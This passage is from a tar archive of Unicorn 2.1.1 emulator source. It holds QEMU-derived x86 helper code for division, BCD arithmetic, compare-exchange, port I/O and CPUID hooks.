env, int) DEF_HELPER_1(cli, void, env) DEF_HELPER_1(sti, void, env) DEF_HELPER_1(clac, void, env) DEF_HELPER_1(stac, void, env) DEF_HELPER_3(boundw, void, env, tl, int) DEF_HELPER_3(boundl, void, env, tl, int) DEF_HELPER_1(rsm, void, env) DEF_HELPER_2(into, void, env, int) DEF_HELPER_2(cmpxchg8b_unlocked, void, env, tl) DEF_HELPER_2(cmpxchg8b, void, env, tl) #ifdef TARGET_X86_64 DEF_HELPER_2(cmpxchg16b_unlocked, void, env, tl) DEF_HELPER_2(cmpxchg16b, void, env, tl) #endif DEF_HELPER_1(single_step, void, env) DEF_HELPER_1(rechecking_single_step, void, env) DEF_HELPER_1(cpuid, void, env) DEF_HELPER_1(rdtsc, void, env) DEF_HELPER_1(rdtscp, void, env) DEF_HELPER_1(rdpmc, void, env) DEF_HELPER_1(rdmsr, void, env) DEF_HELPER_1(wrmsr, void, env) DEF_HELPER_2(check_iob, void, env, i32) DEF_HELPER_2(check_iow, void, env, i32) DEF_HELPER_2(check_iol, void, env, i32) DEF_HELPER_3(outb, void, env, i32, i32) DEF_HELPER_2(inb, tl, env, i32) DEF_HELPER_3(outw, void, env, i32, i32) DEF_HELPER_2(inw, tl, env, i32) DEF_HELPER_3(outl, void, env, i32, i32) DEF_HELPER_2(inl, tl, env, i32) DEF_HELPER_FLAGS_4(bpt_io, TCG_CALL_NO_WG, void, env, i32, i32, tl) DEF_HELPER_3(svm_check_intercept_param, void, env, i32, i64) DEF_HELPER_4(svm_check_io, void, env, i32, i32, i32) DEF_HELPER_3(vmrun, void, env, int, int) DEF_HELPER_1(vmmcall, void, env) DEF_HELPER_2(vmload, void, env, int) DEF_HELPER_2(vmsave, void, env, int) DEF_HELPER_1(stgi, void, env) DEF_HELPER_1(clgi, void, env) DEF_HELPER_1(skinit, void, env) DEF_HELPER_2(invlpga, void, env, int) /* x86 FPU */ DEF_HELPER_2(flds_FT0, void, env, i32) DEF_HELPER_2(fldl_FT0, void, env, i64) DEF_HELPER_2(fildl_FT0, void, env, s32) DEF_HELPER_2(flds_ST0, void, env, i32) DEF_HELPER_2(fldl_ST0, void, env, i64) DEF_HELPER_2(fildl_ST0, void, env, s32) DEF_HELPER_2(fildll_ST0, void, env, s64) DEF_HELPER_1(fsts_ST0, i32, env) DEF_HELPER_1(fstl_ST0, i64, env) DEF_HELPER_1(fist_ST0, s32, env) DEF_HELPER_1(fistl_ST0, s32, env) DEF_HELPER_1(fistll_ST0, s64, env) DEF_HELPER_1(fistt_ST0, s32, env) DEF_HELPER_1(fisttl_ST0, s32, env) DEF_HELPER_1(fisttll_ST0, s64, env) DEF_HELPER_2(fldt_ST0, void, env, tl) DEF_HELPER_2(fstt_ST0, void, env, tl) DEF_HELPER_1(fpush, void, env) DEF_HELPER_1(fpop, void, env) DEF_HELPER_1(fdecstp, void, env) DEF_HELPER_1(fincstp, void, env) DEF_HELPER_2(ffree_STN, void, env, int) DEF_HELPER_1(fmov_ST0_FT0, void, env) DEF_HELPER_2(fmov_FT0_STN, void, env, int) DEF_HELPER_2(fmov_ST0_STN, void, env, int) DEF_HELPER_2(fmov_STN_ST0, void, env, int) DEF_HELPER_2(fxchg_ST0_STN, void, env, int) DEF_HELPER_1(fcom_ST0_FT0, void, env) DEF_HELPER_1(fucom_ST0_FT0, void, env) DEF_HELPER_1(fcomi_ST0_FT0, void, env) DEF_HELPER_1(fucomi_ST0_FT0, void, env) DEF_HELPER_1(fadd_ST0_FT0, void, env) DEF_HELPER_1(fmul_ST0_FT0, void, env) DEF_HELPER_1(fsub_ST0_FT0, void, env) DEF_HELPER_1(fsubr_ST0_FT0, void, env) DEF_HELPER_1(fdiv_ST0_FT0, void, env) DEF_HELPER_1(fdivr_ST0_FT0, void, env) DEF_HELPER_2(fadd_STN_ST0, void, env, int) DEF_HELPER_2(fmul_STN_ST0, void, env, int) DEF_HELPER_2(fsub_STN_ST0, void, env, int) DEF_HELPER_2(fsubr_STN_ST0, void, env, int) DEF_HELPER_2(fdiv_STN_ST0, void, env, int) DEF_HELPER_2(fdivr_STN_ST0, void, env, int) DEF_HELPER_1(fchs_ST0, void, env) DEF_HELPER_1(fabs_ST0, void, env) DEF_HELPER_1(fxam_ST0, void, env) DEF_HELPER_1(fld1_ST0, void, env) DEF_HELPER_1(fldl2t_ST0, void, env) DEF_HELPER_1(fldl2e_ST0, void, env) DEF_HELPER_1(fldpi_ST0, void, env) DEF_HELPER_1(fldlg2_ST0, void, env) DEF_HELPER_1(fldln2_ST0, void, env) DEF_HELPER_1(fldz_ST0, void, env) DEF_HELPER_1(fldz_FT0, void, env) DEF_HELPER_1(fnstsw, i32, env) DEF_HELPER_1(fnstcw, i32, env) DEF_HELPER_2(fldcw, void, env, i32) DEF_HELPER_1(fclex, void, env) DEF_HELPER_1(fwait, void, env) DEF_HELPER_1(fninit, void, env) DEF_HELPER_2(fbld_ST0, void, env, tl) DEF_HELPER_2(fbst_ST0, void, env, tl) DEF_HELPER_1(f2xm1, void, env) DEF_HELPER_1(fyl2x, void, env) DEF_HELPER_1(fptan, void, env) DEF_HELPER_1(fpatan, void, env) DEF_HELPER_1(fxtract, void, env) DEF_HELPER_1(fprem1, void, env) DEF_HELPER_1(fprem, void, env) DEF_HELPER_1(fyl2xp1, void, env) DEF_HELPER_1(fsqrt, void, env) DEF_HELPER_1(fsincos, void, env) DEF_HELPER_1(frndint, void, env) DEF_HELPER_1(fscale, void, env) DEF_HELPER_1(fsin, void, env) DEF_HELPER_1(fcos, void, env) DEF_HELPER_3(fstenv, void, env, tl, int) DEF_HELPER_3(fldenv, void, env, tl, int) DEF_HELPER_3(fsave, void, env, tl, int) DEF_HELPER_3(frstor, void, env, tl, int) DEF_HELPER_FLAGS_2(fxsave, TCG_CALL_NO_WG, void, env, tl) DEF_HELPER_FLAGS_2(fxrstor, TCG_CALL_NO_WG, void, env, tl) DEF_HELPER_FLAGS_3(xsave, TCG_CALL_NO_WG, void, env, tl, i64) DEF_HELPER_FLAGS_3(xsaveopt, TCG_CALL_NO_WG, void, env, tl, i64) DEF_HELPER_FLAGS_3(xrstor, TCG_CALL_NO_WG, void, env, tl, i64) DEF_HELPER_FLAGS_2(xgetbv, TCG_CALL_NO_WG, i64, env, i32) DEF_HELPER_FLAGS_3(xsetbv, TCG_CALL_NO_WG, void, env, i32, i64) DEF_HELPER_FLAGS_2(rdpkru, TCG_CALL_NO_WG, i64, env, i32) DEF_HELPER_FLAGS_3(wrpkru, TCG_CALL_NO_WG, void, env, i32, i64) DEF_HELPER_FLAGS_2(pdep, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(pext, TCG_CALL_NO_RWG_SE, tl, tl, tl) /* MMX/SSE */ DEF_HELPER_2(ldmxcsr, void, env, i32) DEF_HELPER_1(enter_mmx, void, env) DEF_HELPER_1(emms, void, env) DEF_HELPER_3(movq, void, env, ptr, ptr) #define SHIFT 0 #include "ops_sse_header.h" #define SHIFT 1 #include "ops_sse_header.h" DEF_HELPER_3(rclb, tl, env, tl, tl) DEF_HELPER_3(rclw, tl, env, tl, tl) DEF_HELPER_3(rcll, tl, env, tl, tl) DEF_HELPER_3(rcrb, tl, env, tl, tl) DEF_HELPER_3(rcrw, tl, env, tl, tl) DEF_HELPER_3(rcrl, tl, env, tl, tl) #ifdef TARGET_X86_64 DEF_HELPER_3(rclq, tl, env, tl, tl) DEF_HELPER_3(rcrq, tl, env, tl, tl) #endif DEF_HELPER_1(rdrand, tl, env) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/int_helper.c���������������������������������������������������������0000664�0000000�0000000�00000026750�14675241067�0020441�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 integer helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "qemu/guest-random.h" //#define DEBUG_MULDIV /* modulo 9 table */ static const uint8_t rclb_table[32] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 1, 2, 3, 4, }; /* modulo 17 table */ static const uint8_t rclw_table[32] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, }; /* division, flags are undefined */ void helper_divb_AL(CPUX86State *env, target_ulong t0) { unsigned int num, den, q, r; num = (env->regs[R_EAX] & 0xffff); den = (t0 & 0xff); if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = (num / den); if (q > 0xff) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q &= 0xff; r = (num % den) & 0xff; env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | (r << 8) | q; } void helper_idivb_AL(CPUX86State *env, target_ulong t0) { int num, den, q, r; num = (int16_t)env->regs[R_EAX]; den = (int8_t)t0; if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = (num / den); if (q != (int8_t)q) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q &= 0xff; r = (num % den) & 0xff; env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | (r << 8) | q; } void helper_divw_AX(CPUX86State *env, target_ulong t0) { unsigned int num, den, q, r; num = (env->regs[R_EAX] & 0xffff) | ((env->regs[R_EDX] & 0xffff) << 16); den = (t0 & 0xffff); if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = (num / den); if (q > 0xffff) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q &= 0xffff; r = (num % den) & 0xffff; env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | q; env->regs[R_EDX] = (env->regs[R_EDX] & ~0xffff) | r; } void helper_idivw_AX(CPUX86State *env, target_ulong t0) { int num, den, q, r; num = (env->regs[R_EAX] & 0xffff) | ((env->regs[R_EDX] & 0xffff) << 16); den = (int16_t)t0; if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = ((int64_t)num / den); if (q != (int16_t)q) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q &= 0xffff; r = (num % den) & 0xffff; env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | q; env->regs[R_EDX] = (env->regs[R_EDX] & ~0xffff) | r; } void helper_divl_EAX(CPUX86State *env, target_ulong t0) { unsigned int den, r; uint64_t num, q; num = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); den = (unsigned int)t0; if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = (num / den); r = (num % den); if (q > 0xffffffff) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } env->regs[R_EAX] = (uint32_t)q; env->regs[R_EDX] = (uint32_t)r; } void helper_idivl_EAX(CPUX86State *env, target_ulong t0) { int den, r; int64_t num, q; num = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); den = (int)t0; if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = (num / den); r = (num % den); if (q != (int32_t)q) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } env->regs[R_EAX] = (uint32_t)q; env->regs[R_EDX] = (uint32_t)r; } /* bcd */ /* XXX: exception */ void helper_aam(CPUX86State *env, int base) { int al, ah; al = env->regs[R_EAX] & 0xff; ah = al / base; al = al % base; env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); CC_DST = al; } void helper_aad(CPUX86State *env, int base) { int al, ah; al = env->regs[R_EAX] & 0xff; ah = (env->regs[R_EAX] >> 8) & 0xff; al = ((ah * base) + al) & 0xff; env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al; CC_DST = al; } void helper_aaa(CPUX86State *env) { int icarry; int al, ah, af; int eflags; eflags = cpu_cc_compute_all(env, CC_OP); af = eflags & CC_A; al = env->regs[R_EAX] & 0xff; ah = (env->regs[R_EAX] >> 8) & 0xff; icarry = (al > 0xf9); if (((al & 0x0f) > 9) || af) { al = (al + 6) & 0x0f; ah = (ah + 1 + icarry) & 0xff; eflags |= CC_C | CC_A; } else { eflags &= ~(CC_C | CC_A); al &= 0x0f; } env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); CC_SRC = eflags; } void helper_aas(CPUX86State *env) { int icarry; int al, ah, af; int eflags; eflags = cpu_cc_compute_all(env, CC_OP); af = eflags & CC_A; al = env->regs[R_EAX] & 0xff; ah = (env->regs[R_EAX] >> 8) & 0xff; icarry = (al < 6); if (((al & 0x0f) > 9) || af) { al = (al - 6) & 0x0f; ah = (ah - 1 - icarry) & 0xff; eflags |= CC_C | CC_A; } else { eflags &= ~(CC_C | CC_A); al &= 0x0f; } env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); CC_SRC = eflags; } void helper_daa(CPUX86State *env) { int old_al, al, af, cf; int eflags; eflags = cpu_cc_compute_all(env, CC_OP); cf = eflags & CC_C; af = eflags & CC_A; old_al = al = env->regs[R_EAX] & 0xff; eflags = 0; if (((al & 0x0f) > 9) || af) { al = (al + 6) & 0xff; eflags |= CC_A; } if ((old_al > 0x99) || cf) { al = (al + 0x60) & 0xff; eflags |= CC_C; } env->regs[R_EAX] = (env->regs[R_EAX] & ~0xff) | al; /* well, speed is not an issue here, so we compute the flags by hand */ eflags |= (al == 0) << 6; /* zf */ eflags |= parity_table[al]; /* pf */ eflags |= (al & 0x80); /* sf */ CC_SRC = eflags; } void helper_das(CPUX86State *env) { int al, al1, af, cf; int eflags; eflags = cpu_cc_compute_all(env, CC_OP); cf = eflags & CC_C; af = eflags & CC_A; al = env->regs[R_EAX] & 0xff; eflags = 0; al1 = al; if (((al & 0x0f) > 9) || af) { eflags |= CC_A; if (al < 6 || cf) { eflags |= CC_C; } al = (al - 6) & 0xff; } if ((al1 > 0x99) || cf) { al = (al - 0x60) & 0xff; eflags |= CC_C; } env->regs[R_EAX] = (env->regs[R_EAX] & ~0xff) | al; /* well, speed is not an issue here, so we compute the flags by hand */ eflags |= (al == 0) << 6; /* zf */ eflags |= parity_table[al]; /* pf */ eflags |= (al & 0x80); /* sf */ CC_SRC = eflags; } #ifdef TARGET_X86_64 static void add128(uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) { *plow += a; /* carry test */ if (*plow < a) { (*phigh)++; } *phigh += b; } static void neg128(uint64_t *plow, uint64_t *phigh) { *plow = ~*plow; *phigh = ~*phigh; add128(plow, phigh, 1, 0); } /* return TRUE if overflow */ static int div64(uint64_t *plow, uint64_t *phigh, uint64_t b) { uint64_t q, r, a1, a0; int i, qb, ab; a0 = *plow; a1 = *phigh; if (a1 == 0) { q = a0 / b; r = a0 % b; *plow = q; *phigh = r; } else { if (a1 >= b) { return 1; } /* XXX: use a better algorithm */ for (i = 0; i < 64; i++) { ab = a1 >> 63; a1 = (a1 << 1) | (a0 >> 63); if (ab || a1 >= b) { a1 -= b; qb = 1; } else { qb = 0; } a0 = (a0 << 1) | qb; } #if defined(DEBUG_MULDIV) printf("div: 0x%016" PRIx64 "%016" PRIx64 " / 0x%016" PRIx64 ": q=0x%016" PRIx64 " r=0x%016" PRIx64 "\n", *phigh, *plow, b, a0, a1); #endif *plow = a0; *phigh = a1; } return 0; } /* return TRUE if overflow */ static int idiv64(uint64_t *plow, uint64_t *phigh, int64_t b) { int sa, sb; sa = ((int64_t)*phigh < 0); if (sa) { neg128(plow, phigh); } sb = (b < 0); if (sb && (b != 0x8000000000000000LL)) { b = -b; } if (div64(plow, phigh, b) != 0) { return 1; } if (sa ^ sb) { if (*plow > (1ULL << 63)) { return 1; } *plow = 0-*plow; } else { if (*plow >= (1ULL << 63)) { return 1; } } if (sa) { *phigh = 0-*phigh; } return 0; } void helper_divq_EAX(CPUX86State *env, target_ulong t0) { uint64_t r0, r1; if (t0 == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } r0 = env->regs[R_EAX]; r1 = env->regs[R_EDX]; if (div64(&r0, &r1, t0)) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } env->regs[R_EAX] = r0; env->regs[R_EDX] = r1; } void helper_idivq_EAX(CPUX86State *env, target_ulong t0) { uint64_t r0, r1; if (t0 == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } r0 = env->regs[R_EAX]; r1 = env->regs[R_EDX]; if (idiv64(&r0, &r1, t0)) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } env->regs[R_EAX] = r0; env->regs[R_EDX] = r1; } #endif #if TARGET_LONG_BITS == 32 # define ctztl ctz32 # define clztl clz32 #else # define ctztl ctz64 # define clztl clz64 #endif target_ulong helper_pdep(target_ulong src, target_ulong mask) { target_ulong dest = 0; int i, o; for (i = 0; mask != 0; i++) { o = ctztl(mask); mask &= mask - 1; dest |= ((src >> i) & 1) << o; } return dest; } target_ulong helper_pext(target_ulong src, target_ulong mask) { target_ulong dest = 0; int i, o; for (o = 0; mask != 0; o++) { i = ctztl(mask); mask &= mask - 1; dest |= ((src >> i) & 1) << o; } return dest; } #define SHIFT 0 #include "shift_helper_template.h" #undef SHIFT #define SHIFT 1 #include "shift_helper_template.h" #undef SHIFT #define SHIFT 2 #include "shift_helper_template.h" #undef SHIFT #ifdef TARGET_X86_64 #define SHIFT 3 #include "shift_helper_template.h" #undef SHIFT #endif /* Test that BIT is enabled in CR4. If not, raise an illegal opcode exception. This reduces the requirements for rare CR4 bits being mapped into HFLAGS. */ void helper_cr4_testbit(CPUX86State *env, uint32_t bit) { if (unlikely((env->cr[4] & bit) == 0)) { raise_exception_ra(env, EXCP06_ILLOP, GETPC()); } } target_ulong HELPER(rdrand)(CPUX86State *env) { target_ulong ret; if (qemu_guest_getrandom(&ret, sizeof(ret)) < 0) { // qemu_log_mask(LOG_UNIMP, "rdrand: Crypto failure: %s", // error_get_pretty(err)); // error_free(err); /* Failure clears CF and all other flags, and returns 0. */ env->cc_src = 0; return 0; } /* Success sets CF and clears all others. */ env->cc_src = CC_C; return ret; } ������������������������unicorn-2.1.1/qemu/target/i386/machine.c������������������������������������������������������������0000664�0000000�0000000�00000000626�14675241067�0017706�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "sysemu/tcg.h" void cpu_get_fp80(uint64_t *pmant, uint16_t *pexp, floatx80 f) { CPU_LDoubleU temp; temp.d = f; *pmant = temp.l.lower; *pexp = temp.l.upper; } floatx80 cpu_set_fp80(uint64_t mant, uint16_t upper) { CPU_LDoubleU temp; temp.l.upper = upper; temp.l.lower = mant; return temp.d; } ����������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/mem_helper.c���������������������������������������������������������0000664�0000000�0000000�00000012111�14675241067�0020407�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 memory access helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "qemu/int128.h" #include "qemu/atomic128.h" #include "tcg/tcg.h" void helper_cmpxchg8b_unlocked(CPUX86State *env, target_ulong a0) { uintptr_t ra = GETPC(); uint64_t oldv, cmpv, newv; int eflags; eflags = cpu_cc_compute_all(env, CC_OP); cmpv = deposit64(env->regs[R_EAX], 32, 32, env->regs[R_EDX]); newv = deposit64(env->regs[R_EBX], 32, 32, env->regs[R_ECX]); oldv = cpu_ldq_data_ra(env, a0, ra); newv = (cmpv == oldv ? newv : oldv); /* always do the store */ cpu_stq_data_ra(env, a0, newv, ra); if (oldv == cmpv) { eflags |= CC_Z; } else { env->regs[R_EAX] = (uint32_t)oldv; env->regs[R_EDX] = (uint32_t)(oldv >> 32); eflags &= ~CC_Z; } CC_SRC = eflags; } void helper_cmpxchg8b(CPUX86State *env, target_ulong a0) { #ifdef CONFIG_ATOMIC64 uint64_t oldv, cmpv, newv; int eflags; eflags = cpu_cc_compute_all(env, CC_OP); cmpv = deposit64(env->regs[R_EAX], 32, 32, env->regs[R_EDX]); newv = deposit64(env->regs[R_EBX], 32, 32, env->regs[R_ECX]); { uintptr_t ra = GETPC(); int mem_idx = cpu_mmu_index(env, false); TCGMemOpIdx oi = make_memop_idx(MO_TEQ, mem_idx); oldv = helper_atomic_cmpxchgq_le_mmu(env, a0, cmpv, newv, oi, ra); } if (oldv == cmpv) { eflags |= CC_Z; } else { env->regs[R_EAX] = (uint32_t)oldv; env->regs[R_EDX] = (uint32_t)(oldv >> 32); eflags &= ~CC_Z; } CC_SRC = eflags; #else cpu_loop_exit_atomic(env_cpu(env), GETPC()); #endif /* CONFIG_ATOMIC64 */ } #ifdef TARGET_X86_64 void helper_cmpxchg16b_unlocked(CPUX86State *env, target_ulong a0) { uintptr_t ra = GETPC(); Int128 oldv, cmpv, newv; uint64_t o0, o1; int eflags; bool success; if ((a0 & 0xf) != 0) { raise_exception_ra(env, EXCP0D_GPF, GETPC()); } eflags = cpu_cc_compute_all(env, CC_OP); cmpv = int128_make128(env->regs[R_EAX], env->regs[R_EDX]); newv = int128_make128(env->regs[R_EBX], env->regs[R_ECX]); o0 = cpu_ldq_data_ra(env, a0 + 0, ra); o1 = cpu_ldq_data_ra(env, a0 + 8, ra); oldv = int128_make128(o0, o1); success = int128_eq(oldv, cmpv); if (!success) { newv = oldv; } cpu_stq_data_ra(env, a0 + 0, int128_getlo(newv), ra); cpu_stq_data_ra(env, a0 + 8, int128_gethi(newv), ra); if (success) { eflags |= CC_Z; } else { env->regs[R_EAX] = int128_getlo(oldv); env->regs[R_EDX] = int128_gethi(oldv); eflags &= ~CC_Z; } CC_SRC = eflags; } void helper_cmpxchg16b(CPUX86State *env, target_ulong a0) { uintptr_t ra = GETPC(); if ((a0 & 0xf) != 0) { raise_exception_ra(env, EXCP0D_GPF, ra); } else if (HAVE_CMPXCHG128) { int eflags = cpu_cc_compute_all(env, CC_OP); Int128 cmpv = int128_make128(env->regs[R_EAX], env->regs[R_EDX]); Int128 newv = int128_make128(env->regs[R_EBX], env->regs[R_ECX]); int mem_idx = cpu_mmu_index(env, false); TCGMemOpIdx oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); Int128 oldv = helper_atomic_cmpxchgo_le_mmu(env, a0, cmpv, newv, oi, ra); if (int128_eq(oldv, cmpv)) { eflags |= CC_Z; } else { env->regs[R_EAX] = int128_getlo(oldv); env->regs[R_EDX] = int128_gethi(oldv); eflags &= ~CC_Z; } CC_SRC = eflags; } else { cpu_loop_exit_atomic(env_cpu(env), ra); } } #endif void helper_boundw(CPUX86State *env, target_ulong a0, int v) { int low, high; low = cpu_ldsw_data_ra(env, a0, GETPC()); high = cpu_ldsw_data_ra(env, a0 + 2, GETPC()); v = (int16_t)v; if (v < low || v > high) { if (env->hflags & HF_MPX_EN_MASK) { env->bndcs_regs.sts = 0; } raise_exception_ra(env, EXCP05_BOUND, GETPC()); } } void helper_boundl(CPUX86State *env, target_ulong a0, int v) { int low, high; low = cpu_ldl_data_ra(env, a0, GETPC()); high = cpu_ldl_data_ra(env, a0 + 4, GETPC()); if (v < low || v > high) { if (env->hflags & HF_MPX_EN_MASK) { env->bndcs_regs.sts = 0; } raise_exception_ra(env, EXCP05_BOUND, GETPC()); } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/misc_helper.c��������������������������������������������������������0000664�0000000�0000000�00000044573�14675241067�0020605�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 misc helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "exec/ioport.h" #include "uc_priv.h" #include "tcg/tcg-apple-jit.h" void helper_outb(CPUX86State *env, uint32_t port, uint32_t data) { // #ifdef UNICORN_ARCH_POSTFIX // glue(address_space_stb, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port, data & 0xff, // #else // address_space_stb(env->uc, &env->uc->address_space_io, port, data & 0xff, // #endif // cpu_get_mem_attrs(env), NULL); return cpu_outb(env->uc, port, data); } target_ulong helper_inb(CPUX86State *env, uint32_t port) { // #ifdef UNICORN_ARCH_POSTFIX // return glue(address_space_ldub, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port, // #else // return address_space_ldub(env->uc, &env->uc->address_space_io, port, // #endif // cpu_get_mem_attrs(env), NULL); return cpu_inb(env->uc, port); } void helper_outw(CPUX86State *env, uint32_t port, uint32_t data) { // #ifdef UNICORN_ARCH_POSTFIX // glue(address_space_stw, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port, data & 0xffff, // #else // address_space_stw(env->uc, &env->uc->address_space_io, port, data & 0xffff, // #endif // cpu_get_mem_attrs(env), NULL); return cpu_outw(env->uc, port, data); } target_ulong helper_inw(CPUX86State *env, uint32_t port) { // #ifdef UNICORN_ARCH_POSTFIX // return glue(address_space_lduw, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port, // #else // return address_space_lduw(env->uc, &env->uc->address_space_io, port, // #endif // cpu_get_mem_attrs(env), NULL); return cpu_inw(env->uc, port); } void helper_outl(CPUX86State *env, uint32_t port, uint32_t data) { // #ifdef UNICORN_ARCH_POSTFIX // glue(address_space_stl, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port, data, // #else // address_space_stl(env->uc, &env->uc->address_space_io, port, data, // #endif // cpu_get_mem_attrs(env), NULL); return cpu_outl(env->uc, port, data); } target_ulong helper_inl(CPUX86State *env, uint32_t port) { // #ifdef UNICORN_ARCH_POSTFIX // return glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port, // #else // return address_space_ldl(env->uc, &env->uc->address_space_io, port, // #endif // cpu_get_mem_attrs(env), NULL); return cpu_inl(env->uc, port); } void helper_into(CPUX86State *env, int next_eip_addend) { int eflags; eflags = cpu_cc_compute_all(env, CC_OP); if (eflags & CC_O) { raise_interrupt(env, EXCP04_INTO, 1, 0, next_eip_addend); } } void helper_cpuid(CPUX86State *env) { uint32_t eax, ebx, ecx, edx; uc_engine *uc = env->uc; struct hook *hook; int skip_cpuid = 0; cpu_svm_check_intercept_param(env, SVM_EXIT_CPUID, 0, GETPC()); // Unicorn: call registered CPUID hooks HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(env->uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, env->eip)) continue; // Multiple cpuid callbacks returning different values is undefined. // true -> skip the cpuid instruction if (hook->insn == UC_X86_INS_CPUID) { JIT_CALLBACK_GUARD_VAR(skip_cpuid, ((uc_cb_insn_cpuid_t)hook->callback)(env->uc, hook->user_data)); } // the last callback may already asked to stop emulation if (env->uc->stop_request) break; } if (!skip_cpuid) { cpu_x86_cpuid(env, (uint32_t)env->regs[R_EAX], (uint32_t)env->regs[R_ECX], &eax, &ebx, &ecx, &edx); env->regs[R_EAX] = eax; env->regs[R_EBX] = ebx; env->regs[R_ECX] = ecx; env->regs[R_EDX] = edx; } } target_ulong helper_read_crN(CPUX86State *env, int reg) { target_ulong val; cpu_svm_check_intercept_param(env, SVM_EXIT_READ_CR0 + reg, 0, GETPC()); switch (reg) { default: val = env->cr[reg]; break; case 8: if (!(env->hflags2 & HF2_VINTR_MASK)) { // val = cpu_get_apic_tpr(env_archcpu(env)->apic_state); val = 0; } else { val = env->v_tpr; } break; } return val; } void helper_write_crN(CPUX86State *env, int reg, 